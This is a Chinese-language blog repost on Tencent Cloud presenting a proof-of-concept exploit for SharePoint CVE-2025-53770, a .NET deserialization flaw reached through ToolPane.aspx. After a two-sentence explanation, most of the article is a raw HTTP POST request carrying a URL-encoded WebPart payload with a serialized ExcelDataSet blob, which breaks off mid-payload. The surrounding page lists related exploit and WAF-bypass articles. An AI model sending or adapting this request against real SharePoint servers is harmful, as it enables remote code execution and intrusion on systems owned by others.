Loading [MathJax]/jax/output/CommonHTML/config.js
文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
首页
学习
活动
专区
圈层
工具
MCP广场
返回腾讯云官网
社区首页 >专栏 >SharePoint CVE-2025-53770 命令执行 POC

SharePoint CVE-2025-53770 命令执行 POC

作者头像
Khan安全团队
发布于 2025-07-24 01:31:09
发布于 2025-07-24 01:31:09
44500
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

Microsoft SharePoint 中的一个漏洞ToolPane.aspx,该漏洞可供经过身份验证的用户访问,并允许在 WebParts 中注入序列化对象。

这使得攻击者可以滥用CompressedDataTable中使用的属性Scorecard:ExcelDataSet,从而导致.NET 反序列化攻击——可能导致远程代码执行。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1 
Host: x.x.x.x 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 
Content-Length: 7699 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
Accept-Encoding: gzip, deflate, br 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Referer: /_layouts/SignOut.aspx 
Connection: close 
 MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=%0A++++%3C%25%40+Register+Tagprefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%0A++++%3C%25%40+Register+Tagprefix%3D%22asp%22+Namespace%3D%22System.Web.UI%22+Assembly%3D%22System.Web.Extensions%2C+Version%3D4.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D31bf3856ad364e35%22+%25%3E%0A%0A%3Casp%3AUpdateProgress+ID%3D%22UpdateProgress1%22+DisplayAfter%3D%2210%22+%0Arunat%3D%22server%22+AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%3CProgressTemplate%3E%0A++%3Cdiv+class%3D%22divWaiting%22%3E++++++++++++%0A++++%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQHUGQLIi0CAkgUSAw4YjBzeIFANm8i3%2Bz37MftXsyCyRlW7Zlz07PrhymKBaqMvPkyVNZAH%2F6%2Baeffvpv%2FNBv%2Bvm3f8KL1XtYLNP8rBkuwxcnMp0vRtPizcWZRv9enDRW2XI1T98U6Wo5D7MXJ3erKBvF79KH%2FnSSFm%2BiX34Ja3HtlX5ZvUi1Xy%2F%2FlRb%2Fj0dr8ksvXZKtPw7yrBcP0zz8M941Rx8%2BmPMw%2F%2FlnGvvDP%2BPlP%2F90tV28XvAlJ9s8KxZvTk%2FVm9dbvB8ul7PX5%2BebzeZsUz2bzu%2FPK5qmnw%2B6N2rZ%2FbX5IoHVN6ereVGutniZj%2BL5dDH9sHwZT%2FPXuO6luur0ZJS8OV1M85T%2BWqTL07f%2F%2FqeTT37IrTRL87RYnhRhnn484USt9Lq9KIN9c7qcr9LD5%2B4ibazmc0y%2BmcZhlpbDT9jZ24KLsyzd9h9m6ReuOlw5nI7i9CQfFbdxvJoDJA12w%2B3%2Br1URTVdFkiZfMvflEIfp8ItO%2FpjDn85apL%2Bt0iJ%2B7pSn3ZxtigPShD%2F58Oa0pGBjmmVpvASnF2dmWqTzUXx2M1os%2F6r%2F5S%2BPWdpL52vguDhrF8t0XoTZWWs7Cwk3bx7OZun8r5XDBC%2BNztz2
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-07-23,如有侵权请联系 cloudcommunity@tencent.com 删除
漏洞
序列化
microsoft
sharepoint
对象

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

漏洞
序列化
microsoft
sharepoint
对象
评论
登录后参与评论
暂无评论
登录 后参与评论
推荐阅读
编辑精选文章
换一批
万字详解高可用架构设计
7219
Go 开发者必备:Protocol Buffers 入门指南
4444
10分钟带你彻底搞懂分布式链路跟踪
3379
多租户的 4 种常用方案
6721
亿级月活的社交 APP,陌陌如何做到 3 分钟定位故障?
4727
60页PPT全解:DeepSeek系列论文技术要点整理
6196
CVE-2024-8069|Citrix Virtual Apps and Desktops(XEN)远程代码执行漏洞(POC)
产品服务器漏洞virtual
Citrix是一家领先的DaaS提供商,其主要产品是Citrix Virtual Apps and Desktops。该产品提供了虚拟桌面和应用程序交付的解决方案,可以将桌面和应用程序提供给用户的任何设备上。
信安百科
2025/07/30
2050
CVE-2024-8069|Citrix Virtual Apps and Desktops(XEN)远程代码执行漏洞(POC)
干货 | 各种WAF绕过手法学习
网络安全sqlapache编程算法tcp/ip
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
Power7089
2021/04/30
4.2K0
Microsoft ReportViewer 控件类型版本兼容问题及解决方法
其他
错误 Parser Error Message: The base class includes the field 'rvEquipment', but its type (Microsoft.
用户1637609
2018/04/12
3.1K0
Microsoft ReportViewer 控件类型版本兼容问题及解决方法
SharePoint RCE From 0 to 0.9
https网站网络安全安全xml
本文为总结类文章,所写皆为对BlackHat议题Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf 的复现学习,国内也有青藤云实验室的复现文章,有兴趣的推荐去看原文。
鸿鹄实验室
2021/07/06
2K0
SharePoint RCE From 0 to 0.9
Asp.Net 之 Web.config 配置文件详解
asp.net编程算法htmlandroid数据库
  在asp.net中配置文件名一般默认是web.config。每个web.config文件都是基于XML的文本文件,并且可以保存到Web应用程序中的任何目录中。在发布Web应用程序时web.config文件并不编译进dll文件中。如果将来客户端发生了变化,仅仅需要用记事本打开web.config文件编辑相关设置就可以重新正常使用,非常方便。
CherishTheYouth
2019/09/11
6.4K0
Asp.Net 之 Web.config 配置文件详解
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
lucene/solrapache容器镜像服务容器https
Apache Solr 是一个开源的搜索服务器。Solr使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。
墙角睡大觉
2019/11/05
1.3K0
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
"RDLC报表"速成指南
数据处理
RDLC报表是微软自家的报表,已经集成在vs2010中,相对水晶报表更轻量级,更重要的是:可直接在web项目中使用。 使用步骤: 一、创建DataSet 右击->Add New Item-> Data
菩提树下的杨过
2018/01/23
4.1K0
"RDLC报表"速成指南
SharePoint 2019 XSS漏洞CVE-2020-1456复现
phpwindows serversql serverhttpssql
在这篇文章中,我们将分析SharePoint 2019中的一个安全漏洞。虽然这个漏洞不是一个典型的JavaScript XSS,但微软还是把这个漏洞定性为了XSS漏洞。
FB客服
2021/03/09
1.2K0
SharePoint 2019 XSS漏洞CVE-2020-1456复现
XSS挖掘工具资源分享
alertcomdocumentxss工具
网e渗透安全部
2024/05/18
2990
XSS挖掘工具资源分享
Asp.Net4.0/VS2010新变化(6):内置的图表控件
asp.net
.net4.0以前,要想在网页上画个饼图,那还真不是个轻松的活儿,得有点技术含量,比如:可以用System.Drawing下的那些东东,再或者用Silverlight/Flash或第三方控件 现在as
菩提树下的杨过
2018/01/23
1K0
Asp.Net4.0/VS2010新变化(6):内置的图表控件
Apache Solr 漏洞复现
安全apachelucene/solrapi网络安全
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558) 漏洞描述
黑白天安全
2020/09/29
1.9K0
Apache Solr 漏洞复现
CVE-2019-0604分析及武器化
https网络安全文件存储windows安全
该漏洞可造成Windows系统服务器的远程命令执行,有可能完全控制服务器。攻击者可将精心构造的请求通过ItemPickerWebForm控件传入后端EntityInstanceIdEncoder.DecodeEntityInstanceId(encodedId)方法中,因为方法没有对传入的encodedId进行任何处理,也没有对XmlSerializer构造函数的类型参数进行限制,可直接通过XmlSerializer反序列化,造成命令执行。
鸿鹄实验室
2021/04/15
2K0
当InternalsVisibleToAttribute特性遭遇"强签名"
api单元测试
一、如何让Intenal成员暴露给另一个程序集 我们知道Modifier为Internal的类型成员仅限于当前程序集能够访问,但是在某些情况下,我们希望将它们暴露给另一个程序集。比较典型的应用场景包括如下两种: 将一个组件或者模块定义成两个或者两个以上程序集,一个程序集需要访问另一个程序集的Internal成员。比如将一个Logging组件定义成三个程序集:Logging.dll、Logging.Client.dll和Logging.Server.dll。其中后两个分别用于客户端和服务端的日志记录,而它们共
蒋金楠
2018/01/16
7180
当InternalsVisibleToAttribute特性遭遇"强签名"
CRLF攻击原理介绍和使用
http安全网络安全ascii网站
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
全栈工程师修炼指南
2020/10/23
7.9K0
CRLF攻击原理介绍和使用
学习Altas 笔记[JS简单调用服务端方法]
ajaxactionscripthttpasp.netjavascript
      在Ajax框架中,Asp.net方面最强当属Altas最强,以前使用AjaxPro.Net和MagicAjax. 最几个都比较好用。这几个月来Altas已经进入CTP版本,是开始学习研究Altas的时机了。准备利用Altas为 http://www.yupsky.com 开发成员之间在线通讯的类似于MSN这样的功能。今天初步的学习了一下Altas,最基础的学习内容就是使用javascript调用服务端代码。      Altas和AjaxPro.Net类似,但比AjaxPro.Net强大很多。学
张善友
2018/01/19
9880
学习Altas 笔记[JS简单调用服务端方法]
干货 | 突破disable_functions限制执行命令·下
安全https网络安全phpgithub
UAF漏洞(Use-After-Free)是一种内存破坏漏洞,漏洞成因是一块堆内存被释放了之后又被使用。又被使用指的是:指针存在(悬垂指针被引用)。这个引用的结果是不可预测的,因为不知道会发生什么。由于大多数的堆内存其实都是C++对象,所以利用的核心思路就是分配堆去占坑,占的坑中有自己构造的虚表。
HACK学习
2022/02/17
3.6K0
干货 | 突破disable_functions限制执行命令·下
TreeView结合UpdatePanel使用时,SelectedNodeStyle不生效的解决方案
javascript
在某些时候,使用UpdatePanel可以极大的提升开发效率并且获得比较好的用户体验,尤其是做SharePoint开发时。老早就看过MSDN上申明UpdatePanel对TreeView不支持,前段时间在使用时,果然不行,比如选择了某节点但是选择样式压根就不起作用。但是我一向是有问题就解决问题,没问题找问题,抱着这种心态,总算解决了该问题。下面说下解决方案吧:
雪雁-心莱科技
2018/12/27
7770
浅谈加密算法 aes
应用安全开发
常见的不可逆加密算法有MD5,HMAC,SHA1、SHA-224、SHA-256、SHA-384,和SHA-512。他们的特点是,不能从加密后的结果解密出原文,主要用于校检数据的一致性,防止篡改数据,我们之前分析的大部分sign签名都是不可逆算法。也叫散列算法或者哈希算法。
奋飞安全
2022/04/07
2.6K0
由浅入深的域渗透系列一(上)
网络安全安全tcp/ipVPN 连接网站
二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集
重生信息安全
2020/06/04
1.5K0
由浅入深的域渗透系列一(上)
[CVE-2019-0193] - Apache Solr DataImport 远程命令执行分析
phpandroidhttpsjavascript网络安全
语雀链接:https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo
亿人安全
2022/06/30
1.3K0
[CVE-2019-0193] - Apache Solr DataImport 远程命令执行分析
推荐阅读
编辑精选文章
万字详解高可用架构设计Go 开发者必备:Protocol Buffers 入门指南10分钟带你彻底搞懂分布式链路跟踪多租户的 4 种常用方案亿级月活的社交 APP,陌陌如何做到 3 分钟定位故障?60页PPT全解:DeepSeek系列论文技术要点整理
相关讨论
IntelliJ IDEA使用Stream Trace详细信息追踪失败,出现内部错误?
CVE-2024-8069|Citrix Virtual Apps and Desktops(XEN)远程代码执行漏洞(POC)
2050
干货 | 各种WAF绕过手法学习
4.2K0
Microsoft ReportViewer 控件类型版本兼容问题及解决方法
3.1K0
SharePoint RCE From 0 to 0.9
2K0
Asp.Net 之 Web.config 配置文件详解
6.4K0
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
1.3K0
"RDLC报表"速成指南
4.1K0
SharePoint 2019 XSS漏洞CVE-2020-1456复现
1.2K0
XSS挖掘工具资源分享
2990
Asp.Net4.0/VS2010新变化(6):内置的图表控件
1K0
Apache Solr 漏洞复现
1.9K0
CVE-2019-0604分析及武器化
2K0
当InternalsVisibleToAttribute特性遭遇"强签名"
7180
CRLF攻击原理介绍和使用
7.9K0
学习Altas 笔记[JS简单调用服务端方法]
9880
干货 | 突破disable_functions限制执行命令·下
3.6K0
TreeView结合UpdatePanel使用时,SelectedNodeStyle不生效的解决方案
7770
浅谈加密算法 aes
2.6K0
由浅入深的域渗透系列一(上)
1.5K0
[CVE-2019-0193] - Apache Solr DataImport 远程命令执行分析
1.3K0
相关推荐
CVE-2024-8069|Citrix Virtual Apps and Desktops(XEN)远程代码执行漏洞(POC)
更多 >
小小咸鱼YwY0
LV.1
云集资深爬虫工程师
文章
595
获赞
1.2K
专栏
2
作者相关精选
换一批
交个朋友
加入HAI高性能应用服务器交流群
探索HAI应用新境界 共享实践心得
加入腾讯云技术交流站
洞悉AI新动向 Get大咖技术交流群
加入云原生工作实战群
云原生落地实践 技术难题攻坚探讨
换一批
加入讨论
的问答专区 >
china马斯克0
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论
1
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验